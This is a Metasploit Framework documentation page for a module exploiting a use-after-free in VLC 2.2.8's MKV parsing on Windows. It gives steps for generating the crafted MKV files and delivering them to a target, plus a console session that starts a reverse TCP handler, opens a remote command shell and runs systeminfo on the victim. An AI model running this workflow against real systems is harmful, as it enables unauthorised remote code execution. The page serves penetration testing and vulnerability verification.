metasploit-framework/documentation/modules/exploit/windows/fileformat/vlc_mkv.md

Description

VideoLAN VLC <= v2.2.8 (32 and 64 bit) is vulnerable to a use-after-free in its parsing of MKV files.

This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.

Vulnerable Application

VLC <= v2.2.8

Verification Steps

  • ./msfconsole -q
  • use exploit/windows/fileformat/vlc_mkv
  • run
  • Start handler
  • Copy the generated mkv files to the target host and open part1 in VLC
  • Get a shell

Scenarios

Windows 10 x64 running VLC 2.2.8 (x64)

msf5 > use exploit/windows/fileformat/vlc_mkv
msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
lhost => 172.22.222.134
msf5 exploit(windows/fileformat/vlc_mkv) > run

[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf5 exploit(windows/fileformat/vlc_mkv) > 
[*] Started reverse TCP handler on 172.22.222.134:4444 
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...

systeminfo
systeminfo

Host Name:                 DESKTOP-IPOGIJR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134